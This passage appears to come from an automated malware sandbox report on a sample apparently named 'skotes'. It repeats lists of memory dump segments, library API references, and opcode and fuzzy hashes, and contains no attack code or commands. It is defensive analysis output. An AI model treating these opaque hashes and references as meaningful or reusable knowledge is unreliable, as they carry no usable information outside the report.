                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Concurrency::details::Manager::Resource$AllocationCores$Dynamic$AdjustCoreDataDistributeHandlePrepareReceiversTransfer$AllocationsBorrowedBuffersExclusiveFullyGlobalIdleIncreaseInitializeLoadedProcessResetSchedulerShared
                                                                                                                • String ID:
                                                                                                                • API String ID: 2508902052-0
                                                                                                                • Opcode ID: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
                                                                                                                • Instruction ID: c853a1e94f47dd981b7945d769441c66857e07ee2ab483787123c3af67214b9c
                                                                                                                • Opcode Fuzzy Hash: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
                                                                                                                • Instruction Fuzzy Hash: 37817871E002259FCB08CFA8C584A6DB7F6FF89304F1586ADE445AB702DB34AD52CB80
                                                                                                                APIs
                                                                                                                • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 007AEC81
                                                                                                                  • Part of subcall function 007A8F2F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 007A8F50
                                                                                                                • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 007AECE7
                                                                                                                • Concurrency::details::WorkItem::ResolveToken.LIBCONCRT ref: 007AECFF
                                                                                                                • Concurrency::details::WorkItem::BindTo.LIBCONCRT ref: 007AED0C
                                                                                                                  • Part of subcall function 007AE7AF: Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 007AE7D7
                                                                                                                  • Part of subcall function 007AE7AF: Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 007AE86F
                                                                                                                  • Part of subcall function 007AE7AF: Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 007AE879
                                                                                                                  • Part of subcall function 007AE7AF: Concurrency::location::_Assign.LIBCMT ref: 007AE8AD
                                                                                                                  • Part of subcall function 007AE7AF: Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 007AE8B5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Concurrency::details::$Base::Context$Scheduler$EventInternalItem::ProcessorVirtualWork$ActiveAssignBindCommitConcurrency::location::_GroupPointsReclaimResolveRunnableSafeScheduleSegmentThrowTokenTraceTrigger
                                                                                                                • String ID:
                                                                                                                • API String ID: 2363638799-0
                                                                                                                • Opcode ID: 537443d8a4d19eb2e72d36c853d1ae1304ba8621087a32b5bd7bfe44c3a4ff70
                                                                                                                • Instruction ID: f4153978ef90b5e883ba26f1e04e172897687438527517401e5a2c10930b3ae2
                                                                                                                • Opcode Fuzzy Hash: 537443d8a4d19eb2e72d36c853d1ae1304ba8621087a32b5bd7bfe44c3a4ff70
                                                                                                                • Instruction Fuzzy Hash: 3F51A531A01205EFCF24DF60C899BADB775EF85310F158169E9067B396CB78AE05CBA1
                                                                                                                APIs
                                                                                                                • NtFlushProcessWriteBuffers.NTDLL ref: 0079CBAA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: BuffersFlushProcessWrite
                                                                                                                • String ID:
                                                                                                                • API String ID: 2982998374-0
                                                                                                                • Opcode ID: abd4a547c94ff981b129a32ee52978f4679d5981bc153406a3618fe538043846
                                                                                                                • Instruction ID: 781ee6303d977e359de3a83f93a5c632e0651c186dc7cb6e1d62c096602ecc0c
                                                                                                                • Opcode Fuzzy Hash: abd4a547c94ff981b129a32ee52978f4679d5981bc153406a3618fe538043846
                                                                                                                • Instruction Fuzzy Hash: 8AB09232A1383447CE522B14BC4869D7768AA84F1130A9156D801AB2248A192E824BDC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 041bb8124cb9a17c88949b6dbf1b1a2c98a462071e852060c5941a3a15defa69
                                                                                                                • Instruction ID: 39d684943e75435760fb68d69cafd24efd3b16b873fc6d921cb31f8006e1af20
                                                                                                                • Opcode Fuzzy Hash: 041bb8124cb9a17c88949b6dbf1b1a2c98a462071e852060c5941a3a15defa69
                                                                                                                • Instruction Fuzzy Hash: 4B518CB2E026068BDB25CF58E8C57AABBF1FB58304F24C56AD405EB251D378AE40CF54
                                                                                                                APIs
                                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0079F2BB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: std::invalid_argument::invalid_argument
                                                                                                                • String ID: pEvents
                                                                                                                • API String ID: 2141394445-2498624650
                                                                                                                • Opcode ID: 715f47d339c03ce9d68f3f66742c7f09caf8e9f20cb26cc9a91549ca349b2470
                                                                                                                • Instruction ID: 39063cc2f3ee51c0538ac9412ecc8c284ea919e7e67455bb3ac316f7e8585913
                                                                                                                • Opcode Fuzzy Hash: 715f47d339c03ce9d68f3f66742c7f09caf8e9f20cb26cc9a91549ca349b2470
                                                                                                                • Instruction Fuzzy Hash: E4817A31D00219DBCF25DFA8E985BAEB7B5BF45310F244529E401EB282DB3CAE45CB91
                                                                                                                APIs
                                                                                                                • Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 007B26E3
                                                                                                                  • Part of subcall function 007B24E1: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 007B2504
                                                                                                                • Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 007B2704
                                                                                                                • Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 007B2711
                                                                                                                • Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 007B275F
                                                                                                                • Concurrency::details::SchedulerBase::AcquireQuickCacheSlot.LIBCMT ref: 007B27E6
                                                                                                                • Concurrency::details::WorkSearchContext::QuickSearch.LIBCMT ref: 007B27F9
                                                                                                                • Concurrency::details::WorkSearchContext::SearchCacheLocal_Runnables.LIBCONCRT ref: 007B2846
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
